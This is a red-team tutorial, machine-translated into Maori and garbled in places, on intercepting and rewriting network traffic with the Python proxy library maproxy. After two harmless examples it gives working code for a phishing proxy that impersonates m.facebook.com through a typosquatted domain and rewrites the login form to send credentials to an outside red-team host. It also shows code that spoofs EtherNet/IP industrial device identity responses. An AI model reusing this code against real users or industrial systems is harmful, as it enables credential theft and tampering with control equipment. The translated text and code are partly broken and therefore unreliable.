I whakaritea te whakamaoritanga o te tuhinga i te ahiahi o te timatanga o te akoranga .
Tuhinga
He maha nga momo aromatawai haumarutanga, mai i nga whakamatautau urunga auau me nga mahi a te Kapa Whero ki te hacking nga taputapu IoT/ICS me te SCADA, ka uru ki te mahi me nga kawa whatunga rua, ara, te haukoti me te whakarereke i nga raraunga whatunga i waenga i te kiritaki me te whaainga. Ko te hongi i nga waka whatunga ehara i te mea uaua na te mea he taputapu a tatou penei i a Wireshark, Tcpdump, Scapy ranei, engari ko te whakarereketanga he ahua kaha ake te mahi na te mea me whai momo atanga ki te panui i nga raraunga whatunga, tātari, huri. i runga i te rere ka whakahokia atu ki te kaihautu whainga i roto i te waa tino. I tua atu, he mea pai mena ka taea e taua taputapu te mahi aunoa me nga hononga whakarara maha me te whakarite ma te whakamahi i nga tuhinga.
I tetahi ra ka kitea e ahau tetahi taputapu e kiia ana , na nga tuhinga i tino marama ki ahau tera maproxy – ko taku e hiahia ana. He takawaenga TCP tino ngawari, whai kiko me te ngawari te whirihora. I whakamatauria e au tenei taputapu ki etahi tono tino uaua, tae atu ki nga taputapu ICS (he maha nga paatete) kia kite mena ka taea e ia te whakahaere i nga hononga whakarara maha, a he pai te mahi a te taputapu.
Ma tenei tuhinga e whakaatu ki a koe te tukatuka raraunga whatunga i runga i te rere ma te whakamahi maproxy.
tirohanga
Tool maproxy kei runga i a Tornado, he anga whatunga tukutahi rongonui me te pakeke i roto i te Python.
I te nuinga o te waa, ka taea te mahi i roto i nga momo momo:
TCP:TCP– nga hononga TCP kore whakamuna;TCP:SSLиSSL:TCP– me te whakamunatanga kotahi-ara;SSL:SSL– whakamunatanga rua-ara.
Ka tae mai hei whare pukapuka. Mo te tiimata tere, ka taea e koe te whakamahi tauira tauira e whakaata ana i te kaupapa matua :
all.pycertificate.pemlogging_proxy.pyprivatekey.pemssl2ssl.pyssl2tcp.pytcp2ssl.pytcp2tcp.py
Take 1 – takawaenga ararua ngawari
I runga i tcp2tcp.py:
#!/usr/bin/env python
import tornado.ioloop
import maproxy.proxyserver
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()
i te taunoa ProxyServer() e rua nga tohenga - ko te waahi hononga me te tauranga whaainga. server.listen() kotahi te tautohetohe - te tauranga mo te whakarongo ki te hononga taumai.
Te whakahaere i te tuhinga:
# python tcp2tcp.py
Hei whakahaere i te whakamatautau, ka hono atu matou ki tetahi tūmau SSH rohe na roto i ta maatau tuhinga takawaenga, e whakarongo ana 2222/tcp tauranga me te hono ki te tauranga paerewa 22/tcp Tūmau SSH:
Ko te kara powhiri e whakamohio ana ki a koe kua angitu ta maatau tauira tuhinga ki te takawaenga i nga hokohoko whatunga.
Take 2 – whakarerekētanga raraunga
Ko tetahi atu tuhinga whakaatu logging_proxy.py pai mo te taunekeneke me nga raraunga whatunga. Ko nga korero i roto i te konae e whakaatu ana i nga tikanga akomanga ka taea e koe te whakarereke kia tutuki ai to whainga:
Ko te mea tino pai kei konei:
on_c2p_done_read– ki te haukoti raraunga i te huarahi mai i te kiritaki ki te tūmau;on_p2s_done_read- whakamuri.
Me ngana ki te huri i te kara SSH ka hoki mai te tūmau ki te kiritaki:
[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]Whakahaerehia te tuhinga:
Ka kite koe, i pohehe te kiritaki na te mea kua hurihia te ingoa tūmau SSH mo ia «DumnySSH».
Take 3 – wharangi paetukutuku hītinihanga ngawari
He huarahi mutunga kore ki te whakamahi i tenei taputapu. I tenei wa ka aro atu tatou ki tetahi mea whaihua ake mai i te taha whakahaere o te Kapa Whero. Kia peehia te wharangi taunga m.facebook.com me te whakamahi i tetahi rohe ritenga me te hapa tika, hei tauira, m.facebok.com. Mo nga kaupapa whakaaturanga, me whakaaro noa na matou te rohe i rehitatia.
Ka hanga e matou he hononga whatunga kore whakamuna me o matou takawaenga patunga me te Stream SSL ki te tūmau Facebook (31.13.81.36). Kia pai ai te mahi o tenei tauira, me whakakapi te pane o te kaihautu HTTP me te wero i te ingoa kaihautu tika, ka whakakorehia ano e matou te taapiri whakautu kia ngawari ai te uru atu ki nga ihirangi. I te mutunga ka whakakapihia e matou te puka HTML kia tukuna mai nga tohu whakaurunga ki a matou hei utu mo nga tūmau a Facebook:
[…]
def on_c2p_done_read(self,data):
# replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
def on_p2s_done_read(self,data):
# partial replacement of response
data = data.replace("action="/mi/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]Hei hua:
Kei te kite koe, i angitu taatau ki te whakakapi i te waahi taketake.
Take 4 – Tauranga Itarangi/IP
Kua roa ahau e mahi ana ki nga taputapu ahumahi me nga rorohiko (ICS/SCADA), penei i nga kaiwhakahaere programmable (PLC), I/O modules, puku, relays, arawhata papamahi taiao me te maha atu. Ko tenei keehi mo te hunga e pai ana ki nga mea ahumahi. Ko te hacking i enei otinga ko te purei kaha ki nga kawa whatunga. I roto i te tauira e whai ake nei, e hiahia ana ahau ki te whakaatu me pehea e taea ai e koe te whakarereke i nga hokohoko whatunga ICS/SCADA.
Mo tenei ka hiahia koe i nga mea e whai ake nei:
- Te hongi whatunga, hei tauira, Wireshark;
- Itarangi / IP he taputapu SIP noa ranei, ka kitea e koe ma te whakamahi i te ratonga Shodan;
- Ko ta matou tuhinga kei runga
maproxy.
Tuatahi, me titiro tatou he aha te ahua o te urupare tautuhi mai i te CIP (Common Industrial Protocol):
Ka whakatutukihia te tautuhi taputapu ma te whakamahi i te kawa Ethernet/IP, he putanga whakarei ake o te kawa Ethernet ahumahi e takai ana i nga kawa whakahaere penei i te CIP. Ka hurihia e matou te ingoa ID kua tohua e kitea ana i te whakaahua "NI-IndComm mo Ethernet" te whakamahi i ta maatau tuhinga takawaenga. Ka taea e matou te whakamahi ano i te tuhinga logging_proxy.py me te whakarereke i te tikanga o te karaehe on_p2s_done_read, no te mea e hiahia ana matou kia kitea he ingoa tuakiri rereke i runga i te kiritaki.
Waehere:
[…]
def on_p2s_done_read(self,data):
# partial replacement of response
# Checking if we got List Identity message response
if data[26:28] == b'x0cx00':
print('Got response, replacing')
data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]
Ko te tikanga, e rua nga wa i tono matou mo te tautuhi taputapu, ko te whakautu tuarua ko te mea taketake, ko te mea tuatahi i whakarereke i runga i te rere.
Na te whakamutunga
I aku whakaaro maproxy He taputapu watea me te ngawari, kua tuhia hoki ki te Python, no reira ka whakapono ahau ka whai hua ano koe ma te whakamahi. Ko te tikanga, he nui ake nga taputapu matatini mo te tukatuka me te whakarereke i nga raraunga whatunga, engari me nui ake te aro me te nuinga o te waa ka hangaia mo tetahi keehi whakamahi motuhake, hei tauira. , ranei mo nga keehi e rite ana ki te tuatoru, ranei mo te keehi whakamutunga. Ko tetahi huarahi, tetahi atu ranei, me te awhina maproxy ka taea e koe te whakatinana tere i o whakaaro mo te haukoti i nga raraunga whatunga, na te mea he tino marama nga tauira tauira.
Source: will.com